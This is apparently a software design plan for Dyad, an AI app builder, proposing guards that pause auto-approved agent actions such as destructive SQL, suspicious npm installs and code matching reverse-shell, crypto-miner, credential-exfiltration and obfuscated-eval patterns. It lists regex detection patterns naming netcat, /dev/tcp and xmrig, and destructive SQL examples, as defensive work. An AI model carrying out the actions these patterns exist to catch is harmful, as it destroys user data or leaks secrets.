Back to Dyad

Dangerous Action Guards

plans/dangerous-action-guards.md

0.44.030.1 KB
Original Source

Dangerous Action Guards

Generated by swarm planning session on 2026-02-14

Summary

Add automatic safety guards that detect and warn users before executing dangerous actions -- destructive SQL queries, malicious npm packages, and suspicious code patterns -- even when auto-approve is enabled. Includes a "dangerous approval override" toggle for power users who want to bypass all safety checks.

Problem Statement

Users building apps with Dyad can inadvertently (or through prompt injection) execute destructive actions. Today, Dyad's only defense is the consent banner ("Allow once / Always allow / Decline"), which users frequently bypass with auto-approve or "Always allow" settings. Once bypassed, there is zero validation:

  • SQL queries run as-is -- a single DROP TABLE can destroy hours of work
  • Package names are passed directly to shell commands with no validation (and there is an existing command injection vulnerability in executeAddDependency.ts)
  • File writes from the LLM are completely unscanned

The LLM is an untrusted actor. Prompt injection, hallucination, and model errors can generate destructive operations the user never intended. Auto-approve removes the last line of defense. Users trust Dyad to help them build safely.

Scope

In Scope (MVP)

  1. Dangerous SQL detection -- Heuristic pattern matching for destructive SQL operations (DROP, TRUNCATE, DELETE without WHERE, etc.). Force an enhanced consent prompt even if auto-approve is enabled.
  2. Malicious npm package detection -- Input sanitization (fix command injection vulnerability), registry existence check pre-install, npm audit post-install for known CVEs.
  3. Narrow code injection scanning -- High-confidence pattern detection for reverse shells, crypto miners, credential exfiltration, and obfuscated eval payloads. Near-zero false positive tolerance.
  4. Enhanced consent banner -- Danger variant with red/destructive styling, human-readable explanations, and two-button design (no "Always allow" for dangerous actions).
  5. Dangerous approval override -- Settings toggle to skip all danger checks, with confirmation dialog requiring typed acknowledgment and persistent UI indicator when active.
  6. package.json write detection -- When write_file or search_replace targets package.json, run the same package validation on newly-added dependencies.
  7. Telemetry -- Track danger detections, categories, and user decisions (allow/decline) to tune false positive rates.

Out of Scope (Follow-up)

  • LLM-based SQL semantic analysis (expensive, latency, provider dependency)
  • Comprehensive code security scanning beyond the narrow pattern set
  • MCP tool danger detection (MCP tools are opaque -- we don't control their behavior)
  • Typosquatting detection (requires maintaining/fetching popular package lists)
  • Sandboxed SQL execution / dry-run mode
  • Build-mode proposal security risk interception (separate code path from tool consent)
  • Per-category danger guard enable/disable in settings

User Stories

  • As a user with auto-approve enabled, I want Dyad to still warn me before executing destructive SQL so that I don't accidentally lose data.
  • As a user building with Supabase, I want to see exactly why a SQL query was flagged as dangerous so that I can make an informed decision to proceed or decline.
  • As a user adding dependencies, I want Dyad to warn me if a package is known-malicious or has known vulnerabilities so that I don't introduce security issues into my app.
  • As a user, I want to see a clear explanation of why an action was flagged so that I can dismiss false positives confidently.
  • As a power user, I want to disable danger checks entirely so that I can work without interruption when I know what I'm doing.
  • As a user reviewing agent actions (auto-approve OFF), I want danger context in the consent banner so that I can make better-informed decisions about which actions to allow.

UX Design

User Flow

Flow 1: Dangerous SQL detected (auto-approve ON)

  1. User has auto-approve enabled and is iterating on their app
  2. Agent generates a SQL query (e.g., DROP TABLE users)
  3. dangerCheck on the SQL tool detects destructive pattern
  4. Instead of auto-executing, the system intercepts and shows a danger consent banner
  5. Banner shows: "Auto-approve paused: this query will permanently delete the users table and all its data"
  6. User clicks "Allow anyway" (destructive style) or "Decline" (default focus)
  7. If approved, execution continues; if declined, the agent gets feedback that the action was blocked

Flow 2: Dangerous SQL detected (auto-approve OFF)

  1. Agent generates a destructive SQL query
  2. dangerCheck detects the pattern
  3. The normal consent banner is shown but with enhanced danger styling (red border, ShieldAlert icon, explanation text)
  4. User reviews and decides with better context than the standard consent banner provides

Flow 3: Malicious npm package detected

  1. Agent attempts to install a package
  2. Package name is validated (sanitization regex) -- invalid names are rejected immediately
  3. Registry existence check confirms the package exists
  4. If the consent banner fires (ask mode or danger-escalated), it includes package metadata
  5. After installation, npm audit --json runs and parses results
  6. If vulnerabilities found: critical/high severity shows red danger banner; moderate/low shows amber warning banner
  7. User reviews advisory details and decides

Flow 4: Suspicious code detected

  1. Agent writes code via write_file, edit_file, or search_replace
  2. Content is scanned against the high-confidence pattern set
  3. If a pattern matches, a danger banner appears showing the filename, flagged snippet, and a specific explanation (e.g., "This code appears to open a reverse shell connection to an external server")
  4. User reviews and decides

Flow 5: Enabling dangerous approval override

  1. User navigates to Settings > Safety section
  2. Finds "Skip all danger checks" toggle (default: OFF)
  3. Toggling ON opens a confirmation dialog: "This will skip all safety warnings for dangerous SQL, suspicious packages, and potentially malicious code. Actions will proceed without review."
  4. Dialog requires typing "I understand" to confirm
  5. Once enabled, a persistent shield-off icon appears in the chat header/status bar
  6. Icon is clickable to jump back to the setting
  7. All danger checks are bypassed; normal consent flow still applies per tool settings

Key States

  • Default (no danger): Invisible. Zero friction. Actions proceed normally per consent settings.
  • Danger detected (auto-approve ON): Red/destructive banner with ShieldAlert icon, explanation, two buttons. Auto-approve paused.
  • Danger detected (auto-approve OFF): Enhanced consent banner with red styling and danger explanation. Same two buttons.
  • Warning detected (lower severity): Amber banner with AlertTriangle icon. Moderate/low npm advisories, DELETE with WHERE clause, etc.
  • Checking safety (async): Brief inline indicator ("Checking packages...") only for async checks like npm registry lookup. Not shown for instant checks (SQL regex).
  • Override active: Persistent shield-off indicator in chat header. All danger checks bypassed.
  • Check failed/unavailable: Fail-open with subtle notification: "Safety check unavailable -- proceeding." User knows the guard wasn't active.

Interaction Details

Danger consent banner:

  • Visually distinct from standard consent banner: red/destructive color scheme, ShieldAlert icon (not Bot icon)
  • Includes: category label ("Dangerous SQL" / "Vulnerable Package" / "Suspicious Code"), human-readable explanation, expandable content preview
  • Two buttons only: "Allow anyway" (destructive variant) and "Decline" (default style)
  • No "Always allow" option -- you cannot permanently approve dangerous actions by category
  • Not dismissible via X button -- only explicit button clicks
  • Takes priority in consent queue (dangerous items shown first)
  • When auto-approve is ON, banner copy reads "Auto-approve paused: [explanation]"

Keyboard navigation:

  • "Decline" is default focused (Enter = safe action)
  • "Allow anyway" requires Tab + Enter (deliberate action)

Queue behavior:

  • If agent fires 5 actions with auto-approve, 4 safe ones auto-execute, 1 dangerous one pauses
  • Multiple dangerous actions in parallel: show sequentially with queue count

Danger explanation quality (required templates):

PatternExplanation Template
DROP TABLE x"This query will permanently delete the {table} table and all its data"
DROP DATABASE x"This query will permanently delete the entire {database} database"
TRUNCATE x"This query will delete all rows from the {table} table"
DELETE FROM x (no WHERE)"This query will delete all rows from the {table} table"
ALTER TABLE x DROP COLUMN y"This query will permanently remove the {column} column from the {table} table"
GRANT / REVOKE"This query modifies database permissions"
npm critical/high advisory"Package {name} has a known vulnerability: {advisory_title} (severity: {severity})"
npm moderate/low advisory"Package {name} has a known advisory: {advisory_title} (severity: {severity})"
Reverse shell pattern"This code appears to open a reverse shell connection to an external server"
Crypto miner pattern"This code contains patterns associated with cryptocurrency mining"
Credential exfiltration"This code appears to send environment variables to an external URL"
Obfuscated eval"This code contains an obfuscated execution pattern (base64-decoded eval)"

Accessibility

  • Not color-alone: danger banner differs via icon (ShieldAlert vs Bot), text label ("Potentially dangerous" vs standard), AND color
  • aria-live="polite" on danger banner (not "assertive" -- the agent is paused, no urgency to interrupt)
  • Focus moves to danger banner when it appears; returns to chat input on resolution
  • "Skip all danger checks" toggle associated with aria-describedby pointing to warning text
  • Confirmation dialog is keyboard-navigable and screen-reader announced

Technical Design

Architecture

Add a dangerCheck method to the existing ToolDefinition interface. This runs before consent and can escalate the consent level from "always" to forced-ask with danger context. The detection logic is per-tool (each tool knows its domain), while the consent escalation is centralized in buildAgentToolSet.

Tool invocation → dangerCheck() → if dangerous, force consent with dangerInfo
                                → if safe, proceed with normal consent flow

New module: src/pro/main/ipc/handlers/local_agent/danger_detection/ containing:

  • sql_heuristics.ts -- SQL pattern matching
  • npm_validation.ts -- Package name sanitization + registry/audit checks
  • code_scanning.ts -- High-confidence malicious code patterns
  • types.ts -- Shared types (DangerCheckResult)

Components Affected

ComponentFile(s)Change Type
Tool definition typestools/types.tsAdd dangerCheck to ToolDefinition interface
Tool set buildertool_definitions.tsWire dangerCheck into execute wrapper, pass dangerInfo to consent request
SQL tooltools/execute_sql.tsAdd SQL danger heuristics via dangerCheck
Dependency tooltools/add_dependency.tsAdd package validation via dangerCheck
Dependency processorexecuteAddDependency.tsFix command injection: use execFile with array args; add post-install npm audit
File write toolstools/write_file.ts, tools/edit_file.ts, tools/search_replace.tsAdd code scanning via dangerCheck; add package.json filename detection
Settings schemasrc/lib/schemas.tsAdd dangerousApprovalOverride field
Settings UINew "Safety" section in settingsToggle with confirmation dialog
Consent bannerAgentConsentBanner.tsxDanger variant (red styling, two buttons, explanation, priority queue)
Consent typesIPC payload typesAdd dangerInfo to consent request
Chat UIChat header/status areaPersistent shield-off indicator when override is active
TelemetryAgent handlerEmit danger detection events

Data Model Changes

UserSettings additions (in schemas.ts):

typescript
dangerousApprovalOverride: z.boolean().optional(), // default: false

New types:

typescript
interface DangerCheckResult {
  level: "warning" | "danger";
  category: "destructive_sql" | "malicious_package" | "suspicious_code";
  message: string; // Human-readable explanation (required, specific)
  details?: string; // Extended details (full query, advisory URL, etc.)
}

Extended consent request payload:

typescript
// In agent-tool:consent-request IPC event
{
  requestId: string;
  chatId: number;
  toolName: string;
  toolDescription: string;
  inputPreview: string;
  dangerInfo: DangerCheckResult | null; // NEW
}

Extended ToolDefinition interface:

typescript
interface ToolDefinition<T> {
  // ... existing fields ...
  dangerCheck?: (
    args: T,
    ctx: AgentContext,
  ) => Promise<DangerCheckResult | null>;
}

API Changes

  • Modified buildAgentToolSet execute wrapper: Before calling requireConsent, run dangerCheck. If result is non-null and dangerousApprovalOverride is not enabled, force consent to "ask" and include dangerInfo in the consent request payload.
  • Modified consent request IPC: Add dangerInfo field to agent-tool:consent-request event.
  • Modified consent response: When dangerInfo is present, only accept "accept-once" or "decline" (no "accept-always").
  • New telemetry events: danger_check:detected and danger_check:override with category, tool name, and user decision.

SQL Danger Heuristics

Patterns to detect (case-insensitive, ignoring SQL comments):

PatternLevelTemplate
DROP TABLEdanger"permanently delete the {table} table"
DROP DATABASEdanger"permanently delete the entire {database} database"
TRUNCATE TABLEdanger"delete all rows from the {table} table"
DELETE FROM without WHEREdanger"delete all rows from the {table} table"
ALTER TABLE ... DROP COLUMNwarning"permanently remove the {column} column"
GRANT / REVOKEwarning"modifies database permissions"
DROP SCHEMA / DROP INDEXwarning"permanently delete database object"

Implementation notes:

  • Strip SQL comments (--, /* */) before pattern matching to prevent bypass
  • Handle multi-statement queries (split on ; and check each)
  • Sub-millisecond execution (regex only, no parsing)

npm Package Validation

Pre-install (in dangerCheck):

  1. Validate package name against npm naming rules: ^(@[a-z0-9-~][a-z0-9-._~]*/)?[a-z0-9-~][a-z0-9-._~]*(@.*)?$
  2. Reject any name that doesn't match (prevents command injection AND invalid packages)
  3. Fetch https://registry.npmjs.org/{package} to confirm existence and check deprecated flag

Post-install (in executeAddDependency):

  1. Run npm audit --json or pnpm audit --json in the app directory
  2. Parse output for new vulnerabilities
  3. If critical/high: show danger banner with advisory details
  4. If moderate/low: show warning banner
  5. Cache advisory data locally with 24-hour TTL for repeated installs

Command injection fix (immediate, independent):

  • Replace exec(\pnpm add ${packageStr}`)withexecFile("pnpm", ["add", ...packages])` or equivalent
  • Validate all package name strings before any shell interaction

Code Injection Patterns

High-confidence, near-zero false positive patterns:

typescript
const DANGER_PATTERNS = [
  // Reverse shells
  {
    pattern: /\b(nc|ncat|netcat)\s+-[a-z]*e\s/i,
    message: "reverse shell connection",
  },
  { pattern: /\/dev\/tcp\//, message: "reverse shell connection" },
  {
    pattern: /child_process.*?(exec|spawn).*?(bash|sh|cmd|powershell)/s,
    message: "shell execution",
  },

  // Crypto miners
  {
    pattern: /\b(coinhive|cryptonight|stratum\+tcp|xmrig)\b/i,
    message: "cryptocurrency mining",
  },

  // Credential exfiltration
  {
    pattern: /process\.env\b.*?\bfetch\s*\(/s,
    message: "environment variable exfiltration",
  },
  {
    pattern: /process\.env\b.*?\bhttp/s,
    message: "environment variable exfiltration",
  },

  // Obfuscated payloads
  { pattern: /\batob\s*\(.*?\beval\b/s, message: "obfuscated code execution" },
  {
    pattern: /Buffer\.from\s*\([^)]+,\s*['"]base64['"]\).*?\beval\b/s,
    message: "obfuscated code execution",
  },
];

Applied to content in write_file, edit_file (edit sketch content), and search_replace (replacement content). Not applied to the full file to avoid false positives from existing code.

Implementation Plan

Phase 0: Security Fix (Independent, Ship Immediately)

  • Fix command injection in executeAddDependency.ts -- replace string interpolation with execFile array args or validate package names with regex before shell execution
  • Add unit tests for package name validation

Phase 1: Foundation

  • Add dangerCheck field to ToolDefinition interface in tools/types.ts
  • Add DangerCheckResult type to danger_detection/types.ts
  • Wire dangerCheck into buildAgentToolSet execute wrapper -- run before consent, force "ask" if dangerous
  • Extend consent request IPC payload with dangerInfo: DangerCheckResult | null
  • Update AgentConsentBanner.tsx with danger variant: red styling, ShieldAlert icon, explanation text, two-button layout (no "Always allow"), priority queue ordering, not X-dismissible
  • Add aria-live="polite", focus management, keyboard defaults (Decline focused)
  • Add danger detection telemetry: danger_check:detected, danger_check:user_decision

Phase 2: SQL Danger Heuristics

  • Implement sql_heuristics.ts with pattern matching for destructive operations
  • Add dangerCheck to executeSqlTool that calls SQL heuristics
  • Handle SQL comment stripping, multi-statement queries
  • Add human-readable explanation templates with table/column name extraction
  • Unit tests: corpus of dangerous and safe SQL, edge cases (DROP in comments, DELETE with complex WHERE, multi-statement)

Phase 3: npm Package Validation

  • Implement npm_validation.ts with package name sanitization regex
  • Add pre-install registry existence check (https://registry.npmjs.org/{package})
  • Add dangerCheck to addDependencyTool for pre-install validation
  • Add post-install npm audit --json / pnpm audit --json parsing in executeAddDependency.ts
  • Map npm advisory severity to danger levels (critical/high = danger, moderate/low = warning)
  • Add local caching for advisory data (24-hour TTL)
  • Handle @version suffix in package names
  • Unit tests: valid/invalid names, known vulnerable packages (mocked registry), severity mapping

Phase 4: Code Injection Scanning

  • Implement code_scanning.ts with high-confidence pattern set
  • Add shared scanContentForDangers(content: string) function
  • Add dangerCheck to writeFileTool, editFileTool, searchReplaceTool
  • For edit_file: scan the edit sketch content, not the final merged file
  • Add package.json detection: if target file is package.json, parse diff and run npm validation on new dependencies
  • Per-pattern explanation templates
  • Unit tests: known malicious patterns, legitimate code that looks suspicious (build tools, base64 in tests)
  • Performance benchmark: verify sub-millisecond execution for regex patterns

Phase 5: Dangerous Approval Override

  • Add dangerousApprovalOverride: boolean to BaseUserSettingsFields in schemas.ts (default: false)
  • Wire override check into buildAgentToolSet -- skip dangerCheck when enabled
  • Add "Safety" section in settings UI, visually separated from auto-approve
  • Implement confirmation dialog with "I understand" text input requirement
  • Add persistent shield-off indicator in chat header when override is active (clickable to jump to setting)
  • Add telemetry for override enable/disable events
  • Consider auto-expiry on app update (re-prompt user to re-enable)

Testing Strategy

  • Unit tests for SQL heuristics: Corpus of 50+ dangerous and safe SQL queries. Edge cases: DROP inside comments, DELETE with complex WHERE clauses, multi-statement queries, case variations, GRANT/REVOKE.
  • Unit tests for npm validation: Valid package names, invalid/malicious names, @scope/package format, package@version format, names with special characters (command injection attempts).
  • Unit tests for code scanning: Known malicious patterns, legitimate code that resembles patterns (build tools using eval, base64 in unit tests, process.env in config files).
  • Integration tests: Verify that dangerCheck results flow through the consent system correctly -- forced consent shows danger banner even when consent is "always", danger info appears in banner, "accept-always" is not an option.
  • E2E tests: Simulate agent attempting dangerous SQL with auto-approve ON; verify danger banner appears with correct explanation. Test override toggle flow.
  • Regression tests: Ensure existing auto-approve workflows are not broken for non-dangerous operations. Verify zero-friction happy path.
  • Performance tests: Benchmark SQL heuristics and code scanning to verify sub-millisecond execution on typical inputs.

Risks & Mitigations

RiskLikelihoodImpactMitigation
False positives erode user trustHIGHHIGHStart with very high-confidence patterns only. Track override rates via telemetry. Remove patterns that produce false positives.
Command injection via package names (EXISTING)HIGHHIGHFix immediately in Phase 0, independent of feature work. Use execFile with array args.
Override + auto-approve = zero guardrailsMEDIUMHIGHTrack this state in telemetry. Consider auto-expiry on app update. Persistent UI indicator.
Narrow code scanning creates false sense of securityMEDIUMMEDIUMHonest messaging: "checks for common malicious patterns" not "security scanning." Document known limitations.
npm audit coverage gaps (no typosquats, zero-days)MEDIUMMEDIUMAccept as known limitation. Document. Consider Socket.dev integration in v2.
Performance impact on file writes from code scanningLOWMEDIUMRegex-only patterns (sub-millisecond). Benchmark before shipping.
Bypass via indirect paths (write benign script that downloads malware)MEDIUMLOWFundamental limitation of static analysis. Accept and document.
npm registry/audit API unavailable (offline/outage)LOWLOWFail-open with notification: "Safety check unavailable -- proceeding."
Pattern list goes stale as threats evolveLOWMEDIUMKeep pattern set small and high-signal. Easy to update (single file).
MCP tools bypass all danger checksLOWLOWDocument as known limitation. Out of scope for v1.

Open Questions

  • Build mode coverage: The autoApproveChanges setting in build mode bypasses the proposal flow, including existing SecurityRisk warnings. This feature only covers local-agent mode. Should build mode be covered in v2?
  • npm: protocol aliases: package.json edits could use "my-pkg": "npm:[email protected]" to bypass name validation. Should we parse these in the package.json detection?
  • Per-category danger guard settings: Should users be able to disable SQL checks but keep npm checks? The category field on DangerCheckResult enables this in the future, but it's not in the MVP.
  • MCP tool danger detection: MCP tools are opaque but could execute SQL or install packages. Future option: let MCP server authors declare danger levels in tool metadata.

Decision Log

DecisionReasoning
Heuristic SQL detection over LLM-basedLLM adds latency, cost, and provider dependency (violates Backend-Flexible principle). Heuristics catch 95%+ of destructive patterns with zero false positives on the obvious cases.
npm audit advisories over Socket.devFree, official, no API key needed. Socket.dev is more comprehensive but adds external dependency. Can upgrade later.
Include narrow code injection scanning in MVPUser decided. Scoped to near-zero false positive patterns (reverse shells, crypto miners, credential exfiltration). Performance impact is minimal (regex-only).
Include dangerous approval override in MVPUser decided. Mitigated with confirmation dialog (typed "I understand"), persistent UI indicator, and telemetry tracking.
Always show danger context (even with auto-approve OFF)Enhances decision quality for all users. Same consent banner component, just with upgraded styling when danger is detected.
Advisory (forced consent) over blockingUsers can still proceed past warnings. This respects user autonomy while ensuring informed consent. The override toggle is the escape hatch from even this.
Two buttons only on danger banner (no "Always allow")Permanently auto-approving dangerous actions defeats the purpose. Users approve per-instance or use the global override.
dangerCheck per-tool over centralized detectionEach tool knows its domain best. SQL heuristics are completely different from npm validation. Co-locating detection with the tool is cleaner and more extensible.
Fix command injection independentlyThis is a security bug that exists today, not a feature. Ship the fix immediately without waiting for the full danger guards feature.
Fail-open when checks are unavailableFail-closed would mean a third-party API outage blocks the user's work. Fail-open with notification is the right balance for a local-first tool.
aria-live="polite" over "assertive"The agent is paused waiting for consent -- there's no urgency. "Assertive" would disruptively interrupt screen reader users.

Generated by dyad:swarm-to-plan